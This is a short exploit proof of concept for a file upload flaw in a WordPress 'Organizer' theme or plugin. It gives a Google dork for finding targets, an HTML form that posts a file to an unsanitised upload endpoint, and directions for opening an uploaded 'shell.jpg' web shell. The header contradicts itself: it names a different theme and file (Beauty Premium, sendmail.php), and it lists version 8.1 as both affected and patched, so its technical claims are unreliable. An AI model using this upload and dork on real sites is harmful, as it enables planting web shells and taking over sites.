<!-- * Exploit Title: Wordpress Plugin Organizer File Upload Vulnerability 6.x * Discovery Date: 2017-05-09 * Public Disclosure Date:2017-05-09 * Vendor Homepage: http://www.tools-hack.com * Exploit Author: sohaip-hackerDZ * forum http://www.spyhackerz.com/forum/ * Contact: https://www.facebook.com/sohaipbarika * Version: 8.1 (may affect newer versions but this was all I had) * Tested on: Wordpress 4.2.x-4.7.x Description ================================================================================ The Beauty Premium theme contains a contact form that is vulnerable to CSRF and File Upload vulnerability in the sendmail.php file. The file attachment gets uploaded to the wordpress upload directory and it is not sanitized, allowing attackers to upload harmful code. PoC ================================================================================ Google Dork inurl:/themes/organizer or detect via WPScan: --> <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/" method="post"> select fuile: <input name="files[]" type="file" /><br /> <input type="submit" value="submit!" /> </form> </body> </html> <!-- File will be visible: http://127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/files/shell.jpg You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly. Update to version 8.1 8.1 https://downloads.wordpress.org/plugin/plugin-organizer.8.1.zip -->